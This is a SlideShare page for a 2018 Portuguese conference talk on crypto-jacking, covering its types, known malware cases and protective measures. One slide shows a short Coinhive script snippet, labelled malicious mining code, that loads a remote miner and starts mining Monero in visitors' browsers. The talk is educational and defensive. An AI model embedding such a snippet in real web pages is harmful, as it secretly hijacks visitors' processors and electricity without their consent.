SlideShare uma empresa Scribd logo
1 de 16
Baixar para ler offline
A Nova Era do
Pedro Tavares <sirpedrotavares@gmail.com>
https://seguranca-informatica.pt
21 de março de 2018
ll Jornadas de InfoWeb
Agenda
● A Importância da Cibersegurança
● O que é Crypto-jacking
● Cryptocurrency - The Inception
● Tipos de Crypto-jacking
● Crypto-jacking em Páginas Web
● Crypto-jacking em Redes Wi-Fi
● Crypto-jacking “ In-the-Wild ”
● Anúncios versus Crypto-mining
● Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Importância da Cibersegurança
Preocupações em 2018
● Internet of Thing (IoT)
● Mobile
● Inteligência Artificial
● Sistemas descentralizados (blockchain)
● Crypto-jacking
● (...)
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Meios e tecnologias para proteçãoCibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
O que é Crypto-jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
O que é Crypto-jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking Crypto-mining
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
O que é Crypto-jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking acontece quando o mining é feito de forma ilegal, i.e.,
sem consentimento e conhecimento
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cryptocurrency - The Inception
[1] “Security without Identification: Transaction Systems to Make Big Brother Obsolete"
https://www.cs.ru.nl/~jhh/pub/secsem/chaum1985bigbrother.pdf
[2] Cyberpunks e outras propostas de moedas criptográficas: https://www.coindesk.com/the-rise-of-the-cypherpunks/
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cryptocurrency - The Inception
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cryptocurrency - The Inception
Criptomoedas tornaram-se uma nova tendência
● Bitcoin
● Ether
● Litecoin
● NEM
● Monero
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Tipos de Crypto-jacking
● Crypto-jacking em Páginas Web
● Crypto-jacking em Redes Wi-Fi
● Crypto-jacking “in-the-wild”
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking em Páginas Web
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
<script src=”https://coin-hive.com/lib/coinhive.min.js“></script>
<script>
var miner = new CoinHive.Anonymous(‘YOUR_TOKEN’);//Monero ID
miner.start();
</script>
Código malicioso de mineração
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking em redes Wi-Fi
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking “ In-the-Wild “
Para todo o tipo de gostos :)
● SQL Injection
● XSS + Social Engineering
● Malware
○ Dofoil (infetou mais de 500.000 computadores Windows)
○ PyCryptoMiner - SSH (dropper instala bot para minerar criptomedas)
○ Tesla Cloud — Ciber atacantes usaram processamento na Cloud
○ Plugins CMS infetados (Browsealoud, etc.)
■ Crypto-jacking em websites (Los Angels Times, Dinheiro Vivo, CR7)
○ Software e extensões com crypto-miners (Jenkins, ApacheCouchDB,
Archive Poster - extensão Google Chrome)
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Anúncios versus Crypto-mining jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Motivação - Obter dinheiro fácil através da capacidade de processamento e
eletricidade de terceiros (crypto-mining => jacking
Crypto-mining jacking
Problemas:
- Pouco retorno (1k visits - 55 sec - €0.36)
- Desempenho (website, browser, PC, Internet)
- Notificação prévia + consentimento
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Proteção
Ponto de vista:
Utilizador
● Opera lançou módulo nativo
● Extensão Chrome: NoCoin
● AV
● Consciencialização (estar alerta) + Ação (notificar)
Infraestrutura
● Monitorização (IDS, WAFs, etc)
● Cibersegurança contínua
● Auditorias de segurança
● Consciencialização + Ação
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
~ «O meu grande bem-haja a todos» ~
Pedro Tavares <sirpedrotavares@gmail.com>

Mais conteúdo relacionado

Semelhante a Nova era-crypto-jacking

Quem vigia os vigilantes: Liberdade vs Controle na internet
Quem vigia os vigilantes: Liberdade vs Controle na internetQuem vigia os vigilantes: Liberdade vs Controle na internet
Quem vigia os vigilantes: Liberdade vs Controle na internetWagner Reck
 
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...Symantec Brasil
 
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...Pedro Ivo Lima
 
Movimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasMovimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasBruno Wagner Gonçalves
 
Movimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasMovimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasBruno Wagner Gonçalves
 
Movimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasMovimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasGabriel Albo
 
Trabalho de Sistemas para internet
Trabalho de Sistemas para internetTrabalho de Sistemas para internet
Trabalho de Sistemas para internetsi03grupo1
 
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...Joao Barreto Fernandes
 
Ransomware como proteger sua empresa
Ransomware como proteger sua empresa Ransomware como proteger sua empresa
Ransomware como proteger sua empresa Bravo Tecnologia
 
Introducao a criptografia
Introducao a criptografiaIntroducao a criptografia
Introducao a criptografiagillojau
 
Kriptacoin Apresentação das moedas virtuais
Kriptacoin Apresentação das moedas virtuaisKriptacoin Apresentação das moedas virtuais
Kriptacoin Apresentação das moedas virtuaisLucas Feat
 
Apresentação kriptacoin - Conheça nosso plano de negócio.
Apresentação kriptacoin - Conheça nosso plano de negócio.Apresentação kriptacoin - Conheça nosso plano de negócio.
Apresentação kriptacoin - Conheça nosso plano de negócio.Jorge Ciriaco
 
Seguranca - básico
Seguranca - básicoSeguranca - básico
Seguranca - básicoJErickPPTs
 
Cybersecurty for People - PhishX Summit de Maio/2018
Cybersecurty for People - PhishX Summit de Maio/2018Cybersecurty for People - PhishX Summit de Maio/2018
Cybersecurty for People - PhishX Summit de Maio/2018PhishX
 
Segurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
Segurança cibernética e software livre - Lourival Araujo - TchêLinux UruguaianaSegurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
Segurança cibernética e software livre - Lourival Araujo - TchêLinux UruguaianaTchelinux
 
Seminário Web Symantec
Seminário Web SymantecSeminário Web Symantec
Seminário Web Symantectechsoupbrasil
 
Sistema de segurança_web
Sistema de segurança_webSistema de segurança_web
Sistema de segurança_webFavsro Fot
 
Palestra Segurança na Internet
Palestra Segurança na InternetPalestra Segurança na Internet
Palestra Segurança na Internetjamillerodrigues
 
Criptografia em segurança da informação
Criptografia em segurança da informaçãoCriptografia em segurança da informação
Criptografia em segurança da informaçãoEwerton Almeida
 

Semelhante a Nova era-crypto-jacking (20)

Quem vigia os vigilantes: Liberdade vs Controle na internet
Quem vigia os vigilantes: Liberdade vs Controle na internetQuem vigia os vigilantes: Liberdade vs Controle na internet
Quem vigia os vigilantes: Liberdade vs Controle na internet
 
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...
 
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...
 
Movimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasMovimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadas
 
Movimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasMovimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadas
 
Movimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasMovimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadas
 
Trabalho de Sistemas para internet
Trabalho de Sistemas para internetTrabalho de Sistemas para internet
Trabalho de Sistemas para internet
 
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...
 
Ransomware como proteger sua empresa
Ransomware como proteger sua empresa Ransomware como proteger sua empresa
Ransomware como proteger sua empresa
 
Introducao a criptografia
Introducao a criptografiaIntroducao a criptografia
Introducao a criptografia
 
Kriptacoin Apresentação das moedas virtuais
Kriptacoin Apresentação das moedas virtuaisKriptacoin Apresentação das moedas virtuais
Kriptacoin Apresentação das moedas virtuais
 
Apresentação kriptacoin - Conheça nosso plano de negócio.
Apresentação kriptacoin - Conheça nosso plano de negócio.Apresentação kriptacoin - Conheça nosso plano de negócio.
Apresentação kriptacoin - Conheça nosso plano de negócio.
 
Seguranca - básico
Seguranca - básicoSeguranca - básico
Seguranca - básico
 
Cybersecurty for People - PhishX Summit de Maio/2018
Cybersecurty for People - PhishX Summit de Maio/2018Cybersecurty for People - PhishX Summit de Maio/2018
Cybersecurty for People - PhishX Summit de Maio/2018
 
Segurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
Segurança cibernética e software livre - Lourival Araujo - TchêLinux UruguaianaSegurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
Segurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
 
Apresentação - Symantec
Apresentação - SymantecApresentação - Symantec
Apresentação - Symantec
 
Seminário Web Symantec
Seminário Web SymantecSeminário Web Symantec
Seminário Web Symantec
 
Sistema de segurança_web
Sistema de segurança_webSistema de segurança_web
Sistema de segurança_web
 
Palestra Segurança na Internet
Palestra Segurança na InternetPalestra Segurança na Internet
Palestra Segurança na Internet
 
Criptografia em segurança da informação
Criptografia em segurança da informaçãoCriptografia em segurança da informação
Criptografia em segurança da informação
 

Último

5 bloco 7 ano - Ensino Relogioso- Lideres Religiosos _ Passei Direto.pdf
5 bloco 7 ano - Ensino Relogioso- Lideres Religiosos _ Passei Direto.pdf5 bloco 7 ano - Ensino Relogioso- Lideres Religiosos _ Passei Direto.pdf
5 bloco 7 ano - Ensino Relogioso- Lideres Religiosos _ Passei Direto.pdfLeloIurk1
 
Slides sobre as Funções da Linguagem.pptx
Slides sobre as Funções da Linguagem.pptxSlides sobre as Funções da Linguagem.pptx
Slides sobre as Funções da Linguagem.pptxMauricioOliveira258223
 
PRÁTICAS PEDAGÓGICAS GESTÃO DA APRENDIZAGEM
PRÁTICAS PEDAGÓGICAS GESTÃO DA APRENDIZAGEMPRÁTICAS PEDAGÓGICAS GESTÃO DA APRENDIZAGEM
PRÁTICAS PEDAGÓGICAS GESTÃO DA APRENDIZAGEMHELENO FAVACHO
 
COMPETÊNCIA 4 NO ENEM: O TEXTO E SUAS AMARRACÕES
COMPETÊNCIA 4 NO ENEM: O TEXTO E SUAS AMARRACÕESCOMPETÊNCIA 4 NO ENEM: O TEXTO E SUAS AMARRACÕES
COMPETÊNCIA 4 NO ENEM: O TEXTO E SUAS AMARRACÕESEduardaReis50
 
Currículo - Ícaro Kleisson - Tutor acadêmico.pdf
Currículo - Ícaro Kleisson - Tutor acadêmico.pdfCurrículo - Ícaro Kleisson - Tutor acadêmico.pdf
Currículo - Ícaro Kleisson - Tutor acadêmico.pdfTutor de matemática Ícaro
 
SLIDE DE Revolução Mexicana 1910 da disciplina cultura espanhola
SLIDE DE Revolução Mexicana 1910 da disciplina cultura espanholaSLIDE DE Revolução Mexicana 1910 da disciplina cultura espanhola
SLIDE DE Revolução Mexicana 1910 da disciplina cultura espanholacleanelima11
 
Revolução russa e mexicana. Slides explicativos e atividades
Revolução russa e mexicana. Slides explicativos e atividadesRevolução russa e mexicana. Slides explicativos e atividades
Revolução russa e mexicana. Slides explicativos e atividadesFabianeMartins35
 
apostila projeto de vida 2 ano ensino médio
apostila projeto de vida 2 ano ensino médioapostila projeto de vida 2 ano ensino médio
apostila projeto de vida 2 ano ensino médiorosenilrucks
 
Urso Castanho, Urso Castanho, o que vês aqui?
Urso Castanho, Urso Castanho, o que vês aqui?Urso Castanho, Urso Castanho, o que vês aqui?
Urso Castanho, Urso Castanho, o que vês aqui?AnabelaGuerreiro7
 
AULA DE CARIOLOGIA TSB introdução tudo sobre
AULA DE CARIOLOGIA TSB introdução tudo sobreAULA DE CARIOLOGIA TSB introdução tudo sobre
AULA DE CARIOLOGIA TSB introdução tudo sobremaryalouhannedelimao
 
Estudar, para quê? Ciência, para quê? Parte 1 e Parte 2
Estudar, para quê?  Ciência, para quê? Parte 1 e Parte 2Estudar, para quê?  Ciência, para quê? Parte 1 e Parte 2
Estudar, para quê? Ciência, para quê? Parte 1 e Parte 2Maria Teresa Thomaz
 
BNCC Geografia.docx objeto de conhecimento
BNCC Geografia.docx objeto de conhecimentoBNCC Geografia.docx objeto de conhecimento
BNCC Geografia.docx objeto de conhecimentoGentil Eronides
 
Recomposiçao em matematica 1 ano 2024 - ESTUDANTE 1ª série.pdf
Recomposiçao em matematica 1 ano 2024 - ESTUDANTE 1ª série.pdfRecomposiçao em matematica 1 ano 2024 - ESTUDANTE 1ª série.pdf
Recomposiçao em matematica 1 ano 2024 - ESTUDANTE 1ª série.pdfFrancisco Márcio Bezerra Oliveira
 
About Vila Galé- Cadeia Empresarial de Hotéis
About Vila Galé- Cadeia Empresarial de HotéisAbout Vila Galé- Cadeia Empresarial de Hotéis
About Vila Galé- Cadeia Empresarial de Hotéisines09cachapa
 
planejamento_estrategico_-_gestao_2021-2024_16015654.pdf
planejamento_estrategico_-_gestao_2021-2024_16015654.pdfplanejamento_estrategico_-_gestao_2021-2024_16015654.pdf
planejamento_estrategico_-_gestao_2021-2024_16015654.pdfmaurocesarpaesalmeid
 
421243121-Apostila-Ensino-Religioso-Do-1-ao-5-ano.pdf
421243121-Apostila-Ensino-Religioso-Do-1-ao-5-ano.pdf421243121-Apostila-Ensino-Religioso-Do-1-ao-5-ano.pdf
421243121-Apostila-Ensino-Religioso-Do-1-ao-5-ano.pdfLeloIurk1
 
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...azulassessoria9
 
3-Livro-Festa-no-céu-Angela-Lago.pdf-·-versão-1.pdf
3-Livro-Festa-no-céu-Angela-Lago.pdf-·-versão-1.pdf3-Livro-Festa-no-céu-Angela-Lago.pdf-·-versão-1.pdf
3-Livro-Festa-no-céu-Angela-Lago.pdf-·-versão-1.pdfBlendaLima1
 
Introdução a Caminhada do Interior......
Introdução a Caminhada do Interior......Introdução a Caminhada do Interior......
Introdução a Caminhada do Interior......suporte24hcamin
 

Último (20)

5 bloco 7 ano - Ensino Relogioso- Lideres Religiosos _ Passei Direto.pdf
5 bloco 7 ano - Ensino Relogioso- Lideres Religiosos _ Passei Direto.pdf5 bloco 7 ano - Ensino Relogioso- Lideres Religiosos _ Passei Direto.pdf
5 bloco 7 ano - Ensino Relogioso- Lideres Religiosos _ Passei Direto.pdf
 
Slides sobre as Funções da Linguagem.pptx
Slides sobre as Funções da Linguagem.pptxSlides sobre as Funções da Linguagem.pptx
Slides sobre as Funções da Linguagem.pptx
 
PRÁTICAS PEDAGÓGICAS GESTÃO DA APRENDIZAGEM
PRÁTICAS PEDAGÓGICAS GESTÃO DA APRENDIZAGEMPRÁTICAS PEDAGÓGICAS GESTÃO DA APRENDIZAGEM
PRÁTICAS PEDAGÓGICAS GESTÃO DA APRENDIZAGEM
 
COMPETÊNCIA 4 NO ENEM: O TEXTO E SUAS AMARRACÕES
COMPETÊNCIA 4 NO ENEM: O TEXTO E SUAS AMARRACÕESCOMPETÊNCIA 4 NO ENEM: O TEXTO E SUAS AMARRACÕES
COMPETÊNCIA 4 NO ENEM: O TEXTO E SUAS AMARRACÕES
 
Currículo - Ícaro Kleisson - Tutor acadêmico.pdf
Currículo - Ícaro Kleisson - Tutor acadêmico.pdfCurrículo - Ícaro Kleisson - Tutor acadêmico.pdf
Currículo - Ícaro Kleisson - Tutor acadêmico.pdf
 
SLIDE DE Revolução Mexicana 1910 da disciplina cultura espanhola
SLIDE DE Revolução Mexicana 1910 da disciplina cultura espanholaSLIDE DE Revolução Mexicana 1910 da disciplina cultura espanhola
SLIDE DE Revolução Mexicana 1910 da disciplina cultura espanhola
 
Revolução russa e mexicana. Slides explicativos e atividades
Revolução russa e mexicana. Slides explicativos e atividadesRevolução russa e mexicana. Slides explicativos e atividades
Revolução russa e mexicana. Slides explicativos e atividades
 
apostila projeto de vida 2 ano ensino médio
apostila projeto de vida 2 ano ensino médioapostila projeto de vida 2 ano ensino médio
apostila projeto de vida 2 ano ensino médio
 
Urso Castanho, Urso Castanho, o que vês aqui?
Urso Castanho, Urso Castanho, o que vês aqui?Urso Castanho, Urso Castanho, o que vês aqui?
Urso Castanho, Urso Castanho, o que vês aqui?
 
AULA DE CARIOLOGIA TSB introdução tudo sobre
AULA DE CARIOLOGIA TSB introdução tudo sobreAULA DE CARIOLOGIA TSB introdução tudo sobre
AULA DE CARIOLOGIA TSB introdução tudo sobre
 
Estudar, para quê? Ciência, para quê? Parte 1 e Parte 2
Estudar, para quê?  Ciência, para quê? Parte 1 e Parte 2Estudar, para quê?  Ciência, para quê? Parte 1 e Parte 2
Estudar, para quê? Ciência, para quê? Parte 1 e Parte 2
 
Aula sobre o Imperialismo Europeu no século XIX
Aula sobre o Imperialismo Europeu no século XIXAula sobre o Imperialismo Europeu no século XIX
Aula sobre o Imperialismo Europeu no século XIX
 
BNCC Geografia.docx objeto de conhecimento
BNCC Geografia.docx objeto de conhecimentoBNCC Geografia.docx objeto de conhecimento
BNCC Geografia.docx objeto de conhecimento
 
Recomposiçao em matematica 1 ano 2024 - ESTUDANTE 1ª série.pdf
Recomposiçao em matematica 1 ano 2024 - ESTUDANTE 1ª série.pdfRecomposiçao em matematica 1 ano 2024 - ESTUDANTE 1ª série.pdf
Recomposiçao em matematica 1 ano 2024 - ESTUDANTE 1ª série.pdf
 
About Vila Galé- Cadeia Empresarial de Hotéis
About Vila Galé- Cadeia Empresarial de HotéisAbout Vila Galé- Cadeia Empresarial de Hotéis
About Vila Galé- Cadeia Empresarial de Hotéis
 
planejamento_estrategico_-_gestao_2021-2024_16015654.pdf
planejamento_estrategico_-_gestao_2021-2024_16015654.pdfplanejamento_estrategico_-_gestao_2021-2024_16015654.pdf
planejamento_estrategico_-_gestao_2021-2024_16015654.pdf
 
421243121-Apostila-Ensino-Religioso-Do-1-ao-5-ano.pdf
421243121-Apostila-Ensino-Religioso-Do-1-ao-5-ano.pdf421243121-Apostila-Ensino-Religioso-Do-1-ao-5-ano.pdf
421243121-Apostila-Ensino-Religioso-Do-1-ao-5-ano.pdf
 
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...
PROVA - ESTUDO CONTEMPORÂNEO E TRANSVERSAL: LEITURA DE IMAGENS, GRÁFICOS E MA...
 
3-Livro-Festa-no-céu-Angela-Lago.pdf-·-versão-1.pdf
3-Livro-Festa-no-céu-Angela-Lago.pdf-·-versão-1.pdf3-Livro-Festa-no-céu-Angela-Lago.pdf-·-versão-1.pdf
3-Livro-Festa-no-céu-Angela-Lago.pdf-·-versão-1.pdf
 
Introdução a Caminhada do Interior......
Introdução a Caminhada do Interior......Introdução a Caminhada do Interior......
Introdução a Caminhada do Interior......
 

Nova era-crypto-jacking

  • 1. A Nova Era do Pedro Tavares <sirpedrotavares@gmail.com> https://seguranca-informatica.pt 21 de março de 2018 ll Jornadas de InfoWeb
  • 2. Agenda ● A Importância da Cibersegurança ● O que é Crypto-jacking ● Cryptocurrency - The Inception ● Tipos de Crypto-jacking ● Crypto-jacking em Páginas Web ● Crypto-jacking em Redes Wi-Fi ● Crypto-jacking “ In-the-Wild ” ● Anúncios versus Crypto-mining ● Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 3. Importância da Cibersegurança Preocupações em 2018 ● Internet of Thing (IoT) ● Mobile ● Inteligência Artificial ● Sistemas descentralizados (blockchain) ● Crypto-jacking ● (...) Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Meios e tecnologias para proteçãoCibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 4. O que é Crypto-jacking Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 5. O que é Crypto-jacking Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Crypto-jacking Crypto-mining Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
